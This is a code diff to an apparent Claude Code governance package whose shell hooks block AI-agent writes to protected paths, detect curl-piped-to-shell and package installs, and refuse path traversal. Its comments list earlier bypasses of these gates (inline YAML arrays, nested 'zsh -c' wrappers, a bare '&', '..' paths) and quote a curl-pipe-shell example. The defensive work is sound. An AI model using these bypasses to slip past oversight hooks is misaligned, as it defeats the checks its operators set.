- # Read a list of scalars from a top-level sequence block.
56
+ # Read a list of scalars from a top-level sequence.
57
57
  # Usage: mapfile -t patterns < <(policy_list "delegate_to_subagent")
58
- # Handles inline "[]" as empty. Stops at the first non-"-" continuation line.
58
+ #
59
+ # Recognized YAML forms:
60
+ #
61
+ # 1. Block sequence (the historical / canonical form):
62
+ # blocked_paths:
63
+ # - .env
64
+ # - .env.*
65
+ # - .rea/HALT
66
+ #
67
+ # 2. Empty inline array (since 0.1.x):
68
+ # blocked_paths: [] # → no entries (returns successfully)
69
+ #
70
+ # 3. Non-empty inline array (added 0.18.0 G1.B/G1.C):
71
+ # blocked_paths: [.env, .env.*, .rea/HALT]
72
+ #
73
+ # Inline arrays may span multiple lines:
74
+ #
75
+ # blocked_paths: [
76
+ # .env,
77
+ # .env.*,
78
+ # .rea/HALT
79
+ # ]
80
+ #
81
+ # Quoted entries (single or double quotes) are unquoted. Leading and
82
+ # trailing whitespace on each entry is trimmed. Empty entries (e.g. from
83
+ # a trailing `,`) are skipped silently.
84
+ #
85
+ # Pre-fix (G1.B/G1.C): the inline array form was VALID YAML but parsed
86
+ # to an empty list — silent bypass of `blocked-paths-bash-gate.sh` and
87
+ # silent ignore of `protected_writes` overrides. Fixed by extending the
88
+ # parser to recognize the inline form in addition to the block form.
89
+ #
90
+ # The block form is still preferred (sed-friendly, line-aligned diffs)
91
+ # but the inline form is now equally enforced.
59
92
  policy_list() {
60
93
  local key="$1"
61
94
  local policy
62
95
  policy=$(policy_path)
63
96
  [[ -z "$policy" ]] && return 0
64
97
  local in_block=0
98
+ local in_inline=0
99
+ local inline_buf=""
65
100
  while IFS= read -r line; do
101
+ # Skip while we're collecting an inline-array body across lines.
102
+ if [[ $in_inline -eq 1 ]]; then
103
+ inline_buf="${inline_buf} ${line}"
104
+ # Detect the closing `]` (any position on the line).
105
+ if printf '%s' "$line" | grep -qE '\]'; then
106
+ _policy_emit_inline_array "$inline_buf"
107
+ return 0
108
+ fi
109
+ continue
110
+ fi
66
111
  if printf '%s' "$line" | grep -qE "^[[:space:]]*${key}:"; then
67
- if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[\]"; then
112
+ # Empty inline `[]` explicit empty list.
113
+ if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[[[:space:]]*\]"; then
68
114
  return 0
69
115
  fi
116
+ # Non-empty inline `[ ... ]` — parse the bracketed body. May or
117
+ # may not close on the same line.
118
+ if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\["; then
119
+ # Strip everything up to and including the opening `[`.
120
+ inline_buf=$(printf '%s' "$line" | sed -E "s/^.*${key}:[[:space:]]*\[//")
121
+ if printf '%s' "$inline_buf" | grep -qE '\]'; then
122
+ # Single-line inline array.
123
+ _policy_emit_inline_array "$inline_buf"
124
+ return 0
125
+ fi
126
+ in_inline=1
127
+ continue
128
+ fi
129
+ # Block-form sequence header — entries follow on subsequent lines.
70
130
  in_block=1
71
131
  continue
72
132
  fi
@@ -80,3 +140,31 @@ policy_list() {
80
140
  fi
81
141
  done < "$policy"
82
142
  }
143
+
144
+ # Emit each entry of an inline-array body (everything between `[` and
145
+ # `]`, possibly across newlines if the caller concatenated lines with
146
+ # spaces). Strips outer brackets, splits on `,`, trims whitespace and
147
+ # matched outer quotes, drops empty entries (trailing-comma tolerance).
148
+ _policy_emit_inline_array() {
149
+ local buf="$1"
150
+ # Drop the closing `]` and anything after it (line comments etc).
151
+ buf=$(printf '%s' "$buf" | sed -E 's/\].*$//')
152
+ # Split on commas.
153
+ local IFS=','
154
+ local raw
155
+ for raw in $buf; do
156
+ # Trim leading + trailing whitespace.
157
+ raw="${raw#"${raw%%[![:space:]]*}"}"
158
+ raw="${raw%"${raw##*[![:space:]]}"}"
159
+ # Drop trailing inline comment (` # comment`).
160
+ raw=$(printf '%s' "$raw" | sed -E 's/[[:space:]]+#.*$//')
161
+ # Re-trim after comment stripping.
162
+ raw="${raw#"${raw%%[![:space:]]*}"}"
163
+ raw="${raw%"${raw##*[![:space:]]}"}"
164
+ # Skip empty entries (trailing comma, blank line in multi-line form).
165
+ [[ -z "$raw" ]] && continue
166
+ # Strip matched outer single or double quotes.
167
+ raw=$(printf '%s' "$raw" | sed -E "s/^[\"']//; s/[\"']$//")
168
+ printf '%s\n' "$raw"
169
+ done
170
+ }
@@ -58,6 +58,13 @@ REA_KILL_SWITCH_INVARIANTS=(
58
58
  # first call to `rea_path_is_protected`; stays the same for the lifetime
59
59
  # of the hook process.
60
60
  REA_PROTECTED_PATTERNS=()
61
+ # 0.18.0 helix-020 G2 fix: track which patterns came from the consumer's
62
+ # explicit `protected_writes` override (vs. the hardcoded default). The
63
+ # override-first ordering in `rea_path_is_protected` checks ONLY this
64
+ # subset before consulting the extension-surface allow-list, so an
65
+ # explicit `protected_writes: [.husky/pre-push.d/]` can re-protect a
66
+ # path that the allow-list would otherwise let through.
67
+ REA_PROTECTED_OVERRIDE_PATTERNS=()
61
68
  _REA_PROTECTED_PATTERNS_LOADED=0
62
69
 
63
70
  # True if $1 is a kill-switch invariant (case-insensitive exact or
@@ -75,8 +82,16 @@ _rea_is_kill_switch() {
75
82
  return 1
76
83
  }
77
84
 
78
- # Load the effective list, applying `protected_paths_relax` from policy.
85
+ # Load the effective list, applying `protected_writes` (full override
86
+ # from policy) and `protected_paths_relax` (subtractor) from policy.
79
87
  # Sources policy-read.sh on demand so this lib stays self-contained.
88
+ #
89
+ # 0.17.0 helix-018 Option A: `protected_writes` lets consumers fully
90
+ # define the protected list. When set, replaces the hardcoded default;
91
+ # kill-switch invariants are always added back regardless. When unset,
92
+ # defaults to REA_PROTECTED_PATTERNS_FULL (the historical 5 patterns).
93
+ # `protected_paths_relax` then subtracts from whatever the effective
94
+ # set is (kill-switch invariants are non-relaxable).
80
95
  _rea_load_protected_patterns() {
81
96
  if [ "$_REA_PROTECTED_PATTERNS_LOADED" = "1" ]; then
82
97
  return 0
@@ -89,14 +104,71 @@ _rea_load_protected_patterns() {
89
104
  source "${BASH_SOURCE[0]%/*}/policy-read.sh" 2>/dev/null || true
90
105
  fi
91
106
 
107
+ # Read both policy keys.
108
+ local writes_list=()
92
109
  local relax_list=()
110
+ local protected_writes_set=0
93
111
  if command -v policy_list >/dev/null 2>&1; then
112
+ # `protected_writes`: detect "set but empty" vs "unset" via a probe.
113
+ # policy_list returns nothing for both cases, so we use a sentinel
114
+ # check on the YAML key existence via a separate probe.
115
+ local pw_present
116
+ pw_present=$(policy_scalar "protected_writes" 2>/dev/null || true)
117
+ # If the key is a list (yq returns "null" or empty for scalar reads
118
+ # of a list), policy_list reads it. We detect "key exists" by
119
+ # checking either policy_scalar's return OR policy_list's output.
120
+ while IFS= read -r entry; do
121
+ [ -z "$entry" ] && continue
122
+ writes_list+=("$entry")
123
+ protected_writes_set=1
124
+ done < <(policy_list "protected_writes" 2>/dev/null || true)
125
+ # If pw_present is "[]" (empty array) — policy_list returns nothing
126
+ # but the key IS set. policy_scalar of a list returns "null" or
127
+ # the literal `[]`. Treat any of those as "set".
128
+ case "$pw_present" in
129
+ '[]'|'null') protected_writes_set=1 ;;
130
+ esac
131
+
94
132
  while IFS= read -r entry; do
95
133
  [ -z "$entry" ] && continue
96
134
  relax_list+=("$entry")
97
135
  done < <(policy_list "protected_paths_relax" 2>/dev/null || true)
98
136
  fi
99
137
 
138
+ # Compose the BASE list:
139
+ # - If `protected_writes` set in policy: that list, plus kill-switch
140
+ # invariants always added (deduped).
141
+ # - Else: REA_PROTECTED_PATTERNS_FULL (hardcoded historical default).
142
+ local base_list=()
143
+ if [ "$protected_writes_set" = "1" ]; then
144
+ local w
145
+ for w in "${writes_list[@]+"${writes_list[@]}"}"; do
146
+ base_list+=("$w")
147
+ done
148
+ # Add kill-switch invariants if not already present.
149
+ local inv inv_lc found
150
+ for inv in "${REA_KILL_SWITCH_INVARIANTS[@]}"; do
151
+ inv_lc=$(printf '%s' "$inv" | tr '[:upper:]' '[:lower:]')
152
+ found=0
153
+ local b b_lc
154
+ for b in "${base_list[@]+"${base_list[@]}"}"; do
155
+ b_lc=$(printf '%s' "$b" | tr '[:upper:]' '[:lower:]')
156
+ if [[ "$b_lc" == "$inv_lc" ]]; then
157
+ found=1
158
+ break
159
+ fi
160
+ done
161
+ if [ "$found" = "0" ]; then
162
+ base_list+=("$inv")
163
+ fi
164
+ done
165
+ else
166
+ local pat
167
+ for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
168
+ base_list+=("$pat")
169
+ done
170
+ fi
171
+
100
172
  # Validate relax entries: any kill-switch invariant in the list is
101
173
  # silently dropped from "permitted to relax" but emits a stderr
102
174
  # advisory so the operator can see why their relax didn't take
@@ -112,10 +184,10 @@ _rea_load_protected_patterns() {
112
184
  fi
113
185
  done
114
186
 
115
- # Build the effective list: every FULL entry that is NOT in the
187
+ # Build the effective list: every BASE entry that is NOT in the
116
188
  # relaxed set (case-insensitive comparison).
117
189
  local pat pat_lc rentry rentry_lc relaxed
118
- for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
190
+ for pat in "${base_list[@]+"${base_list[@]}"}"; do
119
191
  pat_lc=$(printf '%s' "$pat" | tr '[:upper:]' '[:lower:]')
120
192
  relaxed=0
121
193
  for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
@@ -130,6 +202,31 @@ _rea_load_protected_patterns() {
130
202
  fi
131
203
  done
132
204
 
205
+ # 0.18.0 helix-020 G2: also expose the EXPLICIT-OVERRIDE subset so
206
+ # `rea_path_is_protected` can prioritize override matches over the
207
+ # extension-surface allow-list. Only entries that came from a
208
+ # `protected_writes:` declaration land here — kill-switch invariants
209
+ # added defensively in step 2 above are NOT included (they get the
210
+ # historical "extension surface relaxes them" treatment, since the
211
+ # user did NOT explicitly opt in to protecting husky fragments).
212
+ if [ "$protected_writes_set" = "1" ]; then
213
+ local ow ow_lc rentry_lc2 relaxed2
214
+ for ow in "${writes_list[@]+"${writes_list[@]}"}"; do
215
+ ow_lc=$(printf '%s' "$ow" | tr '[:upper:]' '[:lower:]')
216
+ relaxed2=0
217
+ for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
218
+ rentry_lc2=$(printf '%s' "$rentry" | tr '[:upper:]' '[:lower:]')
219
+ if [[ "$ow_lc" == "$rentry_lc2" ]]; then
220
+ relaxed2=1
221
+ break
222
+ fi
223
+ done
224
+ if [ "$relaxed2" = "0" ]; then
225
+ REA_PROTECTED_OVERRIDE_PATTERNS+=("$ow")
226
+ fi
227
+ done
228
+ fi
229
+
133
230
  _REA_PROTECTED_PATTERNS_LOADED=1
134
231
  }
135
232
 
@@ -178,18 +275,57 @@ rea_path_is_extension_surface() {
178
275
  #
179
276
  # 0.16.4 helix-018 Option B: paths inside the documented husky
180
277
  # extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
181
- # return 1 (not protected) BEFORE the prefix-pattern check so they
182
- # don't get caught by `.husky/`'s prefix block. This mirrors the
183
- # §5b allow-list that has been in settings-protection.sh since 0.13.2.
278
+ # return 1 (not protected) by default so they don't get caught by
279
+ # `.husky/`'s prefix block. This mirrors the §5b allow-list that has
280
+ # been in settings-protection.sh since 0.13.2.
281
+ #
282
+ # 0.18.0 helix-020 G2 fix: ORDER MATTERS. The pre-fix function checked
283
+ # the extension-surface allow-list FIRST and short-circuited "not
284
+ # protected" unconditionally. That made the `protected_writes` /
285
+ # `protected_paths` override silently ineffective for any path inside
286
+ # the extension surface — a consumer who wanted `.husky/pre-push.d/`
287
+ # hardened could not opt in. The fix: explicit overrides win FIRST
288
+ # (the consumer asked for this), then the extension-surface
289
+ # short-circuit applies to anything else, then the default protected
290
+ # list. Pseudocode is the canonical version from helix-020 Interactive
291
+ # Finding 1.
184
292
  rea_path_is_protected() {
185
293
  _rea_load_protected_patterns
186
- # Extension-surface allow-list — short-circuit before pattern match.
187
- if rea_path_is_extension_surface "$1"; then
188
- return 1
189
- fi
190
294
  local p_lc
191
295
  p_lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
192
296
  local pattern pattern_lc
297
+
298
+ # 1. Explicit `protected_writes` overrides win. If the consumer
299
+ # listed this path (or its parent prefix) in `protected_writes`,
300
+ # we honor that intent even when the path is on the extension
301
+ # surface. This is what lets a consumer harden their managed
302
+ # `.husky/pre-push.d/` fragments — the carve-out for unmanaged
303
+ # consumer fragments is the default, but it can be undone.
304
+ for pattern in "${REA_PROTECTED_OVERRIDE_PATTERNS[@]+"${REA_PROTECTED_OVERRIDE_PATTERNS[@]}"}"; do
305
+ pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
306
+ if [[ "$p_lc" == "$pattern_lc" ]]; then
307
+ return 0
308
+ fi
309
+ if [[ "$pattern_lc" == */ ]] && [[ "$p_lc" == "$pattern_lc"* ]]; then
310
+ return 0
311
+ fi
312
+ done
313
+
314
+ # 2. Extension-surface allow-list. Paths inside the documented
315
+ # husky extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
316
+ # are NOT protected by default — the consumer manages those
317
+ # fragments freely; settings-protection.sh §5b has the same
318
+ # carve-out on the Write/Edit side. Step 1 above is what lets a
319
+ # consumer override that default per-path.
320
+ if rea_path_is_extension_surface "$1"; then
321
+ return 1
322
+ fi
323
+
324
+ # 3. Default protected list (kill-switch invariants + `.husky/`
325
+ # prefix block + `.claude/settings*` + `.rea/policy.yaml`). When
326
+ # `protected_writes` was set, kill-switch invariants are still
327
+ # enforced via this branch because they were added back into
328
+ # REA_PROTECTED_PATTERNS during `_rea_load_protected_patterns`.
193
329
  for pattern in "${REA_PROTECTED_PATTERNS[@]+"${REA_PROTECTED_PATTERNS[@]}"}"; do
194
330
  pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
195
331
  if [[ "$p_lc" == "$pattern_lc" ]]; then
@@ -58,13 +58,24 @@ fi
58
58
  source "$(dirname "$0")/_lib/cmd-segments.sh"
59
59
 
60
60
  # ── 6. Check if this is a relevant command ────────────────────────────────────
61
+ # 0.18.0 helix-020 / discord-ops Round 10 #2 fix (G4.A): use
62
+ # `any_segment_starts_with`, not `any_segment_matches`. The pre-fix
63
+ # matcher used the unanchored form, so a segment like
64
+ # gh pr edit --body "tracked: gh pr create earlier in the run"
65
+ # triggered IS_RELEVANT=1 because the substring `gh pr create` was
66
+ # anywhere in the segment. The downstream attribution check then
67
+ # scanned the body for the markdown-link / Co-Authored-By patterns,
68
+ # and ANY mention of those terms in the body's prose got blocked
69
+ # even though the actual command was a `gh pr edit` whose intent had
70
+ # nothing to do with structural attribution. The same anchoring fix
71
+ # `dangerous-bash-interceptor.sh` got in 0.16.3 F5 finally lands here.
61
72
  IS_RELEVANT=0
62
73
 
63
- if any_segment_matches "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
74
+ if any_segment_starts_with "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
64
75
  IS_RELEVANT=1
65
76
  fi
66
77
 
67
- if any_segment_matches "$CMD" 'git[[:space:]]+commit'; then
78
+ if any_segment_starts_with "$CMD" 'git[[:space:]]+commit'; then
68
79
  IS_RELEVANT=1
69
80
  fi
70
81
 
@@ -77,7 +88,21 @@ fi
77
88
  FOUND=0
78
89
 
79
90
  # Co-Authored-By with noreply@ email
80
- if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@'; then
91
+ # 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B): exclude
92
+ # GitHub's legitimate `<user>@users.noreply.github.com` collaborator
93
+ # footers from the noreply match. Pre-fix the regex `Co-Authored-By:.*noreply@`
94
+ # matched both AI-tool noreply addresses (anthropic.com, openai.com,
95
+ # github-copilot, etc.) AND GitHub's per-user noreply form, blocking
96
+ # legitimate human collaborator credits. The new regex requires
97
+ # `noreply@` to be followed by something that ISN'T `users.noreply.github.com`
98
+ # — covered via a negative-lookahead simulation: match `noreply@` then
99
+ # either end-of-line, whitespace, `>`, or a domain that does NOT begin
100
+ # with `users.noreply.github.com`. Posix ERE has no lookarounds, so we
101
+ # enumerate the allowed-prefix shapes explicitly. The "AI names" branch
102
+ # below catches Co-Authored-By with named tools regardless of the email
103
+ # domain, so dropping `users.noreply.github.com` from the noreply
104
+ # pattern only relaxes the check for human collaborators — never for AI.
105
+ if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)'; then
81
106
  FOUND=1
82
107
  fi
83
108
 
@@ -257,8 +257,21 @@ fi
257
257
  # in-quote pipes are replaced with a sentinel that the regex doesn't
258
258
  # match. Real curl-pipe-shell still matches because the pipe between
259
259
  # `curl https://x` and `sh` is outside any quote span.
260
- H12_MASKED=$(quote_masked_cmd "$CMD")
261
- if printf '%s' "$H12_MASKED" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
260
+ # 0.17.0 helix-017 #1 fix: also scan inner payloads of nested-shell
261
+ # wrappers (`zsh -c "curl https://x | sh"`). The unwrap helper emits
262
+ # the original command + each inner payload as separate lines; we
263
+ # quote-mask each line independently and grep. If ANY emitted line
264
+ # contains a real curl-pipe-shell, fire H12.
265
+ H12_HIT=0
266
+ while IFS= read -r _h12_line; do
267
+ [ -z "$_h12_line" ] && continue
268
+ _h12_masked=$(quote_masked_cmd "$_h12_line")
269
+ if printf '%s' "$_h12_masked" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
270
+ H12_HIT=1
271
+ break
272
+ fi
273
+ done < <(_rea_unwrap_nested_shells "$CMD")
274
+ if [ "$H12_HIT" = "1" ]; then
262
275
  add_high \
263
276
  "curl/wget piped to shell — remote code execution" \
264
277
  "Executing remote scripts without inspection is a major supply chain risk." \
@@ -58,14 +58,27 @@ extract_packages() {
58
58
  # outer command — but they're never the FIRST token on a segment, so
59
59
  # the anchor rejects them.
60
60
 
61
- # Tokenize on shell separators. Each `IFS=` entry becomes a separate
62
- # segment we can anchor against. We use bash's `mapfile` with a sed
63
- # to inject newlines at separators; awk-based splitting handles the
64
- # quoting heuristic well enough for the realistic cases (agent-issued
65
- # commands rarely have separators inside single-quoted strings that
66
- # would confuse this).
61
+ # 0.17.0 helix-017 #3: unwrap nested-shell wrappers (`bash -c 'PAYLOAD'`,
62
+ # `sh -lc "PAYLOAD"`, etc.) before splitting so the inner install
63
+ # command becomes a segment that anchors against the install-pattern
64
+ # check below. Pre-fix `bash -lc 'npm install pkg'` produced a single
65
+ # segment whose first token was `bash` — install-detection skipped.
66
+ # 0.17.0 helix-019 #3: delegate splitting to the shared
67
+ # `_rea_split_segments` so this gate inherits the full separator set
68
+ # (including bare `&` background-process operator added in 0.16.1)
69
+ # and the quote-mask that prevents over-fire from in-quote separators.
70
+ # Pre-fix the local segmenter splat on `|||&&|;|` only, missing bare
71
+ # `&` — `echo warmup & pnpm add lodash` stayed merged into one segment
72
+ # and the install-pattern leading-token check skipped it entirely.
67
73
  local segments
68
- segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\|)/\n/g')
74
+ if [ -f "$(dirname "$0")/_lib/cmd-segments.sh" ]; then
75
+ # shellcheck source=_lib/cmd-segments.sh
76
+ source "$(dirname "$0")/_lib/cmd-segments.sh"
77
+ segments=$(_rea_split_segments "$cmd")
78
+ else
79
+ # Fallback (lib unavailable): legacy local splitter preserved.
80
+ segments=$(printf '%s\n' "$cmd" | sed -E 's/(\|\||\&\&|;|\||\&)/\n/g')
81
+ fi
69
82
 
70
83
  while IFS= read -r segment; do
71
84
  # Trim leading whitespace.
@@ -118,37 +118,104 @@ REA_ROOT="${CLAUDE_PROJECT_DIR:-$(pwd)}"
118
118
  BODY_FILE_TEXT=""
119
119
  _extract_body_file_paths() {
120
120
  # Emit each `--body-file PATH` and `-F PATH` argument on its own line.
121
- # Skips the stdin form (`-`) and `-F=foo`/`--body-file=foo` (handled
122
- # by a separate awk pass below).
121
+ # Skips the stdin form (`-`) and emits the path verbatim from the
122
+ # equals-form (`--body-file=PATH` / `-F=PATH`).
123
+ #
124
+ # 0.17.0 helix-019 #2: quote-aware tokenization. The pre-fix awk split
125
+ # on whitespace, breaking `--body-file "security notes.md"` into three
126
+ # tokens — the hook then tried to read `"security` (with literal
127
+ # leading quote), failed, and silently skipped the body scan. Now we
128
+ # walk the string with quote-state awareness: whitespace inside
129
+ # matched `"..."` / `'...'` spans is part of the token, not a
130
+ # separator. Single-quote spans have no escape semantics; double-quote
131
+ # spans treat `\"` and `\\` as literal escapes (POSIX shell rules).
123
132
  printf '%s' "$COMMAND" \
124
133
  | awk '
125
- BEGIN { skip_next = 0; flag_was = "" }
134
+ BEGIN { skip_next = 0 }
135
+ function strip_outer_quotes(s, n, first, last) {
136
+ n = length(s)
137
+ if (n < 2) return s
138
+ first = substr(s, 1, 1)
139
+ last = substr(s, n, 1)
140
+ if ((first == "\"" && last == "\"") || (first == "'\''" && last == "'\''")) {
141
+ return substr(s, 2, n - 2)
142
+ }
143
+ return s
144
+ }
145
+ function emit_token(t) {
146
+ if (skip_next) {
147
+ skip_next = 0
148
+ if (t == "-" || t == "") return
149
+ t = strip_outer_quotes(t)
150
+ print t
151
+ return
152
+ }
153
+ if (t == "--body-file" || t == "-F") { skip_next = 1; return }
154
+ if (t ~ /^--body-file=/) {
155
+ v = substr(t, length("--body-file=") + 1)
156
+ v = strip_outer_quotes(v)
157
+ if (v != "" && v != "-") print v
158
+ }
159
+ if (t ~ /^-F=/) {
160
+ v = substr(t, length("-F=") + 1)
161
+ v = strip_outer_quotes(v)
162
+ if (v != "" && v != "-") print v
163
+ }
164
+ }
126
165
  {
127
- n = split($0, toks, /[[:space:]]+/)
128
- for (i = 1; i <= n; i++) {
129
- t = toks[i]
130
- if (skip_next) {
131
- skip_next = 0
132
- if (t == "-" || t == "") continue
133
- # Strip surrounding quotes from the token if present.
134
- gsub(/^["'"'"']/, "", t)
135
- gsub(/["'"'"']$/, "", t)
136
- print t
166
+ line = $0
167
+ n = length(line)
168
+ i = 1
169
+ tok = ""
170
+ mode = 0 # 0=plain, 1=double-quoted, 2=single-quoted
171
+ while (i <= n) {
172
+ ch = substr(line, i, 1)
173
+ if (mode == 0) {
174
+ # 0.18.0 helix-020 G3.B fix: in plain (unquoted) mode,
175
+ # `\X` (any character X) is the POSIX shell escape for
176
+ # the literal character X — most commonly a space in
177
+ # paths like `path\ with\ spaces.md`. Pre-fix the
178
+ # tokenizer treated the `\` as an ordinary character and
179
+ # truncated at the following space, dropping the rest of
180
+ # the path. We now consume the backslash and emit the
181
+ # following byte as a literal part of the current token.
182
+ # `\<eol>` (line-continuation) is left intact — emit the
183
+ # `\` and let the splitter flow into the next record on
184
+ # the assumption that the caller already joined the line.
185
+ if (ch == "\\" && i < n) {
186
+ nxt = substr(line, i + 1, 1)
187
+ tok = tok nxt
188
+ i += 2
189
+ continue
190
+ }
191
+ if (ch == " " || ch == "\t") {
192
+ if (tok != "") { emit_token(tok); tok = "" }
193
+ i++; continue
194
+ }
195
+ if (ch == "\"") { mode = 1; tok = tok ch; i++; continue }
196
+ if (ch == "'\''") { mode = 2; tok = tok ch; i++; continue }
197
+ tok = tok ch
198
+ i++
137
199
  continue
138
200
  }
139
- if (t == "--body-file" || t == "-F") { skip_next = 1; continue }
140
- # Equals form.
141
- if (t ~ /^--body-file=/) {
142
- v = substr(t, length("--body-file=") + 1)
143
- gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
144
- if (v != "" && v != "-") print v
145
- }
146
- if (t ~ /^-F=/) {
147
- v = substr(t, length("-F=") + 1)
148
- gsub(/^["'"'"']/, "", v); gsub(/["'"'"']$/, "", v)
149
- if (v != "" && v != "-") print v
201
+ if (mode == 1) {
202
+ if (ch == "\\" && i < n) {
203
+ nxt = substr(line, i + 1, 1)
204
+ tok = tok ch nxt
205
+ i += 2
206
+ continue
207
+ }
208
+ if (ch == "\"") { mode = 0; tok = tok ch; i++; continue }
209
+ tok = tok ch
210
+ i++
211
+ continue
150
212
  }
213
+ # mode == 2
214
+ if (ch == "'\''") { mode = 0; tok = tok ch; i++; continue }
215
+ tok = tok ch
216
+ i++
151
217
  }
218
+ if (tok != "") emit_token(tok)
152
219
  }'
153
220
  }
154
221
  while IFS= read -r body_path; do
@@ -180,12 +247,24 @@ while IFS= read -r body_path; do
180
247
  esac
181
248
  done
182
249
  resolved="/$(IFS=/; printf '%s' "${_bf_parts[*]}")"
183
- # If the raw path used `..` AND the resolved form escapes REA_ROOT,
184
- # refuse that's the obfuscation shape we care about. A file under
185
- # /tmp or /var/folders without `..` segments is fine.
250
+ # 0.17.0 helix-019 #1: HARD REFUSAL on traversal escaping REA_ROOT.
251
+ # Pre-fix the gate logged "skipping body scan" and exited 0 every
252
+ # sensitive payload at the resolved external path bypassed the
253
+ # disclosure check. The traversal-out-of-root shape exists ONLY to
254
+ # obfuscate; legitimate workflows pass absolute tmpfile paths
255
+ # (`/tmp/...`, `/var/folders/...`) without `..` segments.
186
256
  if [[ "$resolved" != "$REA_ROOT" && "$resolved" != "$REA_ROOT"/* ]]; then
187
- printf 'security-disclosure-gate: --body-file path uses `..` traversal escaping project root; skipping body scan\n' >&2
188
- continue
257
+ {
258
+ printf 'SECURITY DISCLOSURE GATE: --body-file path traversal escapes project root\n'
259
+ printf '\n'
260
+ printf ' Path: %s\n' "$raw_path"
261
+ printf ' Resolved: %s\n' "$resolved"
262
+ printf '\n'
263
+ printf ' Rule: --body-file paths whose canonical form uses `..` segments to\n'
264
+ printf ' escape REA_ROOT are refused. Move the file inside the project\n'
265
+ printf ' tree, or paste the body inline via --body.\n'
266
+ } >&2
267
+ exit 2
189
268
  fi
190
269
  fi
191
270
  if [[ ! -r "$resolved" ]]; then
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@bookedsolid/rea",
3
- "version": "0.16.4",
3
+ "version": "0.18.0",
4
4
  "description": "Agentic governance layer for Claude Code — policy enforcement, hook-based safety gates, audit logging, and Codex-integrated adversarial review for AI-assisted projects",
5
5
  "license": "MIT",
6
6
  "author": "Booked Solid Technology <oss@bookedsolid.tech> (https://bookedsolid.tech)",